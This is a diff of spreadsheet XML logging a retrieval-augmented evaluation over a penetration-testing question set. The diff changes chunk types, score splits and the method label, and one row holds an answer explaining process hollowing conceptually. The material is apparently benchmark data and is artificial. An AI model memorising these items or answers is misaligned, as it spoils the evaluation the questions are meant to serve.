 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I179" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J179" t="n">
@@ -12500,7 +12478,7 @@
       </c>
       <c r="K179" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12550,7 +12528,7 @@
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 159ad073-e6e7-46ae-a133-7467d9fc90e9, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 159ad073-e6e7-46ae-a133-7467d9fc90e9, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 9)
@@ -12559,7 +12537,7 @@
       </c>
       <c r="I180" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J180" t="n">
@@ -12567,7 +12545,7 @@
       </c>
       <c r="K180" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12614,19 +12592,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I181" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J181" t="n">
@@ -12634,7 +12612,7 @@
       </c>
       <c r="K181" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12683,7 +12661,7 @@
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 8)
@@ -12693,7 +12671,7 @@
       </c>
       <c r="I182" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J182" t="n">
@@ -12701,7 +12679,7 @@
       </c>
       <c r="K182" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12751,16 +12729,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I183" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J183" t="n">
@@ -12768,7 +12746,7 @@
       </c>
       <c r="K183" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12823,20 +12801,20 @@
       <c r="H184" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I184" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J184" t="n">
@@ -12844,7 +12822,7 @@
       </c>
       <c r="K184" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12891,19 +12869,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I185" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J185" t="n">
@@ -12911,7 +12889,7 @@
       </c>
       <c r="K185" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12965,12 +12943,12 @@
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 02376962-c540-4738-9da7-8849a102ff34, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 02376962-c540-4738-9da7-8849a102ff34, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I186" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J186" t="n">
@@ -12978,7 +12956,7 @@
       </c>
       <c r="K186" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13025,19 +13003,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 7)
-return-to-libc-ret2libc.md (Chunk: 74893014-5ccd-42f3-a10b-87f1c09a7de1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 6)
+return-to-libc-ret2libc.md (Chunk: 74893014-5ccd-42f3-a10b-87f1c09a7de1, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I187" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J187" t="n">
@@ -13045,7 +13023,7 @@
       </c>
       <c r="K187" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13092,19 +13070,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I188" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J188" t="n">
@@ -13112,7 +13090,7 @@
       </c>
       <c r="K188" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13158,20 +13136,20 @@
       <c r="H189" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I189" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J189" t="n">
@@ -13179,7 +13157,7 @@
       </c>
       <c r="K189" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13228,17 +13206,17 @@
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 82ae08c9-82a2-44ed-9962-a5ff06bb1f9d, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 82ae08c9-82a2-44ed-9962-a5ff06bb1f9d, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I190" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J190" t="n">
@@ -13246,7 +13224,7 @@
       </c>
       <c r="K190" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13313,7 +13291,7 @@
       </c>
       <c r="K191" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13358,21 +13336,21 @@
       </c>
       <c r="H192" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 83e98874-cd3b-47fc-9052-268ced6cea53, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 83e98874-cd3b-47fc-9052-268ced6cea53, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I192" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J192" t="n">
@@ -13380,7 +13358,7 @@
       </c>
       <c r="K192" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13415,7 +13393,7 @@
       <c r="F193" t="inlineStr">
         <is>
           <t>Answer: Process Hollowing
-Explanation: Process Hollowing is a code injection technique that enables an attacker to execute arbitrary code in the address space of another process by replacing its executable image. This can evade detection mechanisms as it appears as a legitimate and benign process to the system's monitoring tools. Reflective DLL Injection involves injecting a DLL into the address space of another process, Heap Spraying prepares the memory layout by populating it with payloads, and API Hooking involves intercepting API calls to modify their behavior. While these techniques may be used in malware, they do not inherently replace the process executable image like Process Hollowing does.</t>
+Explanation: Process Hollowing is a code injection technique that enables an attacker to execute arbitrary code in the address space of another process by replacing its executable image. This can evade detection and maintain persistence on the target system. Reflective DLL Injection involves injecting a DLL into the address space of another process, Heap Spraying prepares the memory layout for use-after-free vulnerability exploitation, and API Hooking intercepts API calls to modify their behavior. However, Process Hollowing is specifically designed to replace an executable image in the address space of a live process, making it the most effective technique for APT scenarios.</t>
         </is>
       </c>
       <c r="G193" t="inlineStr">
@@ -13426,20 +13404,20 @@
       <c r="H193" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 958d7f7e-d213-4f52-a3d0-8804b4d8db4e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 958d7f7e-d213-4f52-a3d0-8804b4d8db4e, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f3f8a348-f98c-4c8e-81ac-c6b7395dbefc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I193" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J193" t="n">
@@ -13447,7 +13425,7 @@
       </c>
       <c r="K193" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13496,7 +13474,7 @@
 preemware_pentestingeval.pdf (Chunk: f3f8a348-f98c-4c8e-81ac-c6b7395dbefc, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
@@ -13506,7 +13484,7 @@
       </c>
